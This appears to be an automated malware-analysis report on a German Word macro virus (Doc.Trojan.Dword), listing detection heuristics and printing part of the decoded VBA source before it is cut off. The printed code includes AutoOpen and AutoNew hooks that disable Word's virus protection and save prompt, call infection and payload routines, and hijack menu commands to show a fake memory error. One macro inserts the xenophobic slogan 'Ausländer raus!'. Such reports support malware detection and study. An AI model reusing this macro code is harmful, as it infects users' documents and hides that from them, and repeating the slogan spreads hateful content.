MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with critical heuristics firing for VBA macros and an AutoOpen macro. The presence of VBA macros, specifically an AutoOpen macro, suggests that malicious code is designed to execute automatically when the document is opened. The 'Dworld' subroutine, though truncated, indicates potential for further malicious actions.
Heuristics 4
-
ClamAV: Doc.Trojan.Dword-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Dword-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30528 bytes |
SHA-256: e2c0f7b0aa87403f0b11c2d4e98dcb3794b7971b4611067c96b97859e6ebd081 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub wechsel()
Attribute wechsel.VB_Description = "Makro aufgezeichnet am 12.01.99 von Harald J. Glatte"
Attribute wechsel.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.wechsel"
' wechsel Makro
' Makro aufgezeichnet am 12.01.99 von Harald J. Glatte
Selection.InsertBreak Type:=wdSectionBreakContinuous
End Sub
Sub Makro1()
Attribute Makro1.VB_Description = "Makro aufgezeichnet am 03.02.99 von Harald J. Glatte"
Attribute Makro1.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Makro1"
'
' Makro1 Makro
' Makro aufgezeichnet am 03.02.99 von Harald J. Glatte
'
ActiveDocument.Shapes.AddTextEffect(msoTextEffect14, "Ausländer raus!" & Chr(13) & "" & Chr(10) & "", _
"Impact", 36#, msoFalse, msoFalse, 181.85, 59.45).Select
Selection.ShapeRange.ScaleWidth 1.3, msoFalse, msoScaleFromTopLeft
Selection.ShapeRange.ScaleHeight 0.38, msoFalse, msoScaleFromTopLeft
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop 7.2
Selection.ShapeRange.IncrementTop -1.85
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.IncrementTop -7.2
Selection.ShapeRange.ScaleWidth 1.08, msoFalse, msoScaleFromBottomRight
Selection.ShapeRange.ScaleHeight 1.02, msoFalse, msoScaleFromTopLeft
End Sub
Attribute VB_Name = "Dworld"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub AnsichtCode()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub AnsichtVBCode()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub AutoOpen()
ShowVisualBasicEditor = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.AllowFastSave = False
End With
On Error GoTo ende_
Call InfNormal
Call InfDok
Call PayloadB
ActiveDocument.SaveAs (WordBasic.[FileName$]())
ende_:
End Sub
Sub AutoNew()
Call AutoOpen
End Sub
Sub DateiDokVorlagen()
On Error Resume Next
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
MsgBox "Nicht genug freien Speicher um Anwendung zu starten", 16, "Microsoft Word - Fehler"
WordBasic.FileExit dlg
End Sub
Sub DateiDruckenStandard()
Randomize
If Second(Now()) <= 30 And Int((3 * Rnd) + 1) = 2 Then
MsgBox "Des Zauberer´s Finger sind im Spiel!", 32, "Microsoft Word"
ScreenUpdating = 0
Call PayloadA
WordBasic.EndOfDocument
Selection.TypeParagraph
Selection.TypeParagraph
Selection.Font.Name = "Courier New"
Selection.Font.ColorIndex = wdRed
Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
WordBasic.Insert "...Die aufgeklärten Brüder der schwarzen Nacht sagen:..."
Selection.TypeParagraph
WordBasic.Insert "-HOOOOOLLDRIIOOOOO!!!-"
WordBasic.StartOfDocument
ScreenUpdating = 1
End If
ActiveDocument.PrintOut
Call InfNormal
Call InfDok
ActiveDocument.SaveAs (WordBasic.[FileName$]())
Call PayloadB
End Sub
Sub DateiÖffnen()
On Error GoTo ende_
ShowVisualBasicEditor = False
WordBasic.DisableAutoMacros 0
With Options
.SaveNormalPrompt = False
End With
With Dialogs(wdDialogFileOpen)
.Show
End With
Call InfDok
ActiveDocument.Save
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.